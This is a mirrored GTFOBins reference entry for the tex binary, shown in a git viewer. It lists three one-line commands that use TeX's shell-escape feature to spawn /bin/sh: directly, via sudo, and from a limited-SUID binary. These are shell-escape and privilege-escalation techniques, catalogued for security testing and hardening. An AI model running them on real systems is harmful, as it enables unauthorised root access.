1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/tex.md

13 lines
254 B
Markdown
Raw Permalink Normal View History

---
2021-04-22 22:13:08 +02:00
functions:
shell:
- code: |
tex --shell-escape '\write18{/bin/sh}\end'
2021-04-22 22:13:08 +02:00
sudo:
- code: |
sudo tex --shell-escape '\write18{/bin/sh}\end'
limited-suid:
- code: |
./tex --shell-escape '\write18{/bin/sh}\end'
---